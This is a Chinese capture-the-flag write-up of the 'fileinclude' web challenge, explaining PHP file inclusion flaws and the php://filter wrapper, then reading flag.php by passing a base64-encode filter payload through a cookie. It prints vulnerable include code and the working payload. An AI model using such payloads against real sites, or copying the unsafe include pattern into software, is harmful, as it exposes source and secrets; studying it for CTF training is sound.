【愚公系列】2023年05月 攻防世界-Web(fileinclude)
文章目录
- 前言
- 1.文件包含漏洞
- 2.php伪协议
- 一、fileinclude
- 1.题目
- 2.答题
前言
1.文件包含漏洞
文件包含漏洞(File Inclusion Vulnerability)是一种常见的Web应用程序漏洞,攻击者可以通过Web应用程序的漏洞,以某种形式包含恶意文件,或者包含在Web服务器上的其他敏感文件,从而实现权限提升、信息泄露、远程代码执行等攻击。
具体案例介绍包括:
PHP系统中的文件包含漏洞:攻击者可以利用PHP特有的文件包含函数include()或require()来实现代码执行攻击,例如常见的漏洞文件为:
//定义一个变量$file并将其传递给include函数中执行 $file = $_GET['file']; include($file);
攻击者通过修改传递的$file变量,替换为恶意代码文件,最终实现远程代码执行攻击。
JSP系统中的文件包含漏洞:JSP脚本中包含的内容可以是任何JSP页面、HTML或纯文本。在其中使用
<%@ include file=""/%>
指令来包含其他JSP文件中的代码。攻击者可以通过修改包含指令中的传递的参数值,来实现包含恶意文件,导致远程代码执行漏洞。ASP系统中的文件包含漏洞:ASP脚本也存在类似于PHP和JSP的文件包含漏洞,攻击者可以利用Server.Execute()、Include()等函数访问其他文件并引用其中的内容,通过修改参数值来执行恶意代码达到攻击目的。
以上三种常见的文件包含漏洞案例只是冰山一角,现实世界中还存在很多其他的文件包含漏洞,系统管理员需要针对不同情况采取不同措施,保障系统的安全性。
2.php伪协议
php://filter
是一个可以在 PHP 中进行数据过滤和流处理的协议。它可以让你通过一些特定的过滤器来处理各种数据流,包括文件,HTTP 请求,以及其它的输入和输出数据流。这些过滤器可以用于实现各种功能,例如数据加密和解密,数据压缩和解压缩,以及数据格式转换等。不过需要注意的是,如果使用不当,该协议也可能导致一些安全问题。协议的语法:
php://filter/[标准输入输出流标识][使用的过滤器]
其中,[标准输入输出流标识] 可以是以下字符串之一:
- read: 表示标准输入流(stdin)
- write: 表示标准输出流(stdout)
- 其它文件系统可用流标识符,比如 php://temp (临时流)和 php://memory(内存流)等。
而 [使用的过滤器] 部分则是一个或多个 PHP 过滤器名称,多个过滤器名称以 | 分隔。例如:urlencode|strip_tags
例如,如果您想使用 urlencode 过滤器将一段字符串编码并将其写入标准输出流(stdout),您可以使用以下语法:
php://filter/write=urlencode|stdout
一、fileinclude
1.题目
2.答题
页面给出了flag在flag.php中,明确了目标,看一下网页源码
分析源码
<?php
if( !ini_get('display_errors') ) {ini_set('display_errors', 'On');}
error_reporting(E_ALL);
$lan = $_COOKIE['language'];
if(!$lan)
{@setcookie("language","english");@include("english.php");
}
else
{@include($lan.".php");
}
$x=file_get_contents('index.php');
echo $x;
?>
$lan
由cookie传入,$lan
不存在则包含english.php,存在则会将$lan
的值拼接.php然后进行包含。
通过cookie传入文件包含的payload,读取源码。
使用burp进行文件包含
php://filter/read=convert.base64-encode/resource=flag //拼接.php后就是flag.php
得到字符串:PD9waHANCiRmbGFnPSJjeWJlcnBlYWNlezRmNTdiYjk0ZjYzMTRhMGI5NjE3OGY4N2NkY2JhOTlhfSI7DQo/Pg==
进行base64解密得到flag:cyberpeace{4f57bb94f6314a0b96178f87cdcba99a}
【愚公系列】2023年05月 攻防世界-Web(fileinclude)相关推荐
- 【愚公系列】2023年05月 攻防世界-Web(lottery)
文章目录 前言 一.lottery 1.题目 2.答题 前言 dirsearch是一个用于Web服务器的爬虫工具,它可以快速地扫描网站的目录,并找出隐藏的文件和目录.dirsearch可以检测出许多常 ...
- 【愚公系列】2023年05月 攻防世界-Web(unseping)
文章目录 前言 一.unseping 1.题目 2.答题 前言 反序列化漏洞是一种安全漏洞,存在于那些使用序列化技术的应用程序中.反序列化是将已序列化数据还原回对象的过程.攻击者可以通过构造恶意序列化 ...
- 【愚公系列】2023年05月 攻防世界-Web(shrine)
文章目录 前言 一.shrine 1.题目 2.答题 前言 Flask是一个轻量级的Web应用程序框架,用于Python编程语言.它是基于Werkzeug WSGI工具箱和Jinja2模板引擎构建的. ...
- 【愚公系列】2023年05月 攻防世界-Web(FlatScience)
文章目录 前言 一.FlatScience 1.题目 2.答题 前言 Robots协议,也称作robots.txt,是一种在Web站点中告诉搜索引擎蜘蛛哪些页面可以被访问的协议.该协议规定了机器人在访 ...
- 【愚公系列】2023年05月 攻防世界-Web(file_include)
文章目录 前言 1.文件包含漏洞 2.php伪协议 3.php包含漏洞函数 一.file_include 1.题目 2.答题 总结 前言 1.文件包含漏洞 文件包含漏洞(File Inclusion ...
- 【愚公系列】2023年05月 攻防世界-Web(Web_php_include)
文章目录 前言 1.文件包含漏洞 2.php伪协议 3.php包含漏洞函数 一.Web_php_include 1.题目 2.答题 2.1 伪协议解题 2.2 中国蚁剑 2.3 数据库写入 前言 1. ...
- 【愚公系列】2023年05月 攻防世界-Web(fileclude)
文章目录 前言 1.文件包含漏洞 2.php伪协议 一.fileclude 1.题目 2.答题 前言 1.文件包含漏洞 文件包含漏洞(File Inclusion Vulnerability)是一种常 ...
- 【愚公系列】2023年05月 攻防世界-Web(Web_php_unserialize)
文章目录 前言 一.Web_php_unserialize 1.题目 2.答题 前言 PHP的序列化漏洞是一种安全漏洞,攻击者可以利用这种漏洞来执行恶意代码或获取敏感信息.具体来说,攻击者可以通过在序 ...
- 【愚公系列】2023年05月 攻防世界-Web(Confusion1)
文章目录 前言 一.Confusion1 1.题目 2.答题 前言 SSTI漏洞(Server Side Template Injection,服务端模板注入漏洞)是一种 web 应用程序中的安全漏洞 ...
最新文章
- [转] Spring Boot特性
- C++ trivial和non-trivial构造函数及POD类型(转)
- 【NLP】关于Transformer的常见问题及解答
- DevOps:从「蒸汽时代」到「高铁时代」,SUNMI DevOps转型之路 | 原力计划
- CentOS安装SVN客户端
- Python数据类型(3)
- rman备份mysql_rman备份与还原
- 关于网页视频下载方法及工具
- win7黑苹果双系统隐藏Clover多余启动项
- Java 合并 取消合并 Excel 单元格
- Timeline(时间线)
- 概率论与数理统计知识框架梳理
- 英语发音之音标4---长元音法()
- ORB-SLAM3编译问题 recipe for target ‘CMakeFiles/ORB_SLAM3.dir/src/LocalMapping.cc.o‘ failed
- 如何取消windows xp开机时的登录界面
- 1:STM32CubeMX配置STM32F103C8T6驱动-下载软件配置RCC,CAN1,USART1
- OSChina 周六乱弹 —— 广州爱情故事
- 【netron】模型可视化工具netron
- 超参数调整的方法介绍
- 项目管理实战20讲干货总结